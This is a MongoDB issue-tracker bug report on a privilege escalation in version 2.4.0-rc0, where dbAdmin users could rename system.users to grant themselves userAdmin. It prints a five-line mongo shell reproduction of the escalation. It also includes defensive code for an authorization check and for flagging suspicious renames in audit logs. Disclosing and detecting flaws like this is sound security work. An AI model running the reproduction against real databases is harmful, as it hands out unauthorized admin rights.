Core Server / SERVER-8623

Unauthorized users are allowed to rename to and from system.users

    • Type: Bug
    • Resolution: Done
    • Priority: Major - P3
    • 2.4.0-rc1
    • Affects Version/s: 2.4.0-rc0
    • Component/s: Security
    • None
    • ALL

      > db.auth('hacker', 'hack') // assume you have readWrite and dbAdmin rights
      > db.system.users.renameCollection('users')
      > db.users.update({ user : 'hacker' }, { $set : { roles : ['userAdmin'] } })
      > db.users.renameCollection('system.users')
      > db.auth('hacker', 'hack') // now you have userAdmin rights


      A user with dbAdmin access is allowed to rename the system.users collection. They are also allowed to rename any collection to system.users (if no collection currently exists under that name). This makes it possible to change user permissions without having userAdmin rights.
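      As an added illustration (not code from this issue or from MongoDB itself), the authorization rule a fix for this class of bug needs, plus a detection pass that flags the same pattern in audit records; the audit line layout, the role strings and the helper names are assumptions for the example.

```javascript
// Added example for SERVER-8623 (assumed helper names and audit layout).
// renameAllowed() is the missing check: a rename to or from a system.*
// collection must require userAdmin, not just dbAdmin.

// Split a full namespace such as "test.system.users" into db and collection.
function parseNamespace(ns) {
  const dot = ns.indexOf('.');
  if (dot <= 0 || dot === ns.length - 1) throw new Error(`invalid namespace: ${ns}`);
  return { db: ns.slice(0, dot), coll: ns.slice(dot + 1) };
}

function isSystemCollection(coll) {
  return coll === 'system' || coll.startsWith('system.');
}

// Policy decision for a caller holding the given roles (role names assumed).
// Ordinary renames need dbAdmin; anything touching system.* needs userAdmin.
function renameAllowed(from, to, roles) {
  const touchesSystem = isSystemCollection(parseNamespace(from).coll) ||
    isSystemCollection(parseNamespace(to).coll);
  return touchesSystem ? roles.includes('userAdmin') : roles.includes('dbAdmin');
}

// Constructed audit-style lines (one JSON object per line; field names assumed).
const SAMPLE_AUDIT = [
  '{"atype":"renameCollection","ts":"2013-02-19T10:00:00Z","users":[{"user":"hacker","db":"test"}],"param":{"old":"test.system.users","new":"test.users"}}',
  '{"atype":"renameCollection","ts":"2013-02-19T10:00:02Z","users":[{"user":"hacker","db":"test"}],"param":{"old":"test.users","new":"test.system.users"}}',
  '{"atype":"renameCollection","ts":"2013-02-19T10:05:00Z","users":[{"user":"app","db":"test"}],"param":{"old":"test.orders_tmp","new":"test.orders"}}',
  '{"atype":"authenticate","ts":"2013-02-19T10:05:01Z","users":[{"user":"app","db":"test"}],"param":{}}',
].join('\n');

// Return the rename events that touched a system.* collection, so a review or
// SIEM rule can surface the system.users swap described in this report.
function findSuspiciousRenames(auditText) {
  const hits = [];
  for (const line of auditText.split('\n')) {
    if (!line.trim()) continue;
    let ev;
    try { ev = JSON.parse(line); } catch (e) { continue; } // skip malformed lines
    if (ev.atype !== 'renameCollection') continue;
    const { old: from, new: to } = ev.param;
    if (isSystemCollection(parseNamespace(from).coll) || isSystemCollection(parseNamespace(to).coll)) {
      hits.push({ ts: ev.ts, user: ev.users.map(u => `${u.user}@${u.db}`).join(','), from, to });
    }
  }
  return hits;
}

console.log(findSuspiciousRenames(SAMPLE_AUDIT));
```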

            Assignee:
            spencer@mongodb.com Spencer Brody (Inactive)
            Reporter:
            andrew.emil@10gen.com Andrew Emil (Inactive)
            Votes:
            0
            Watchers:
            4
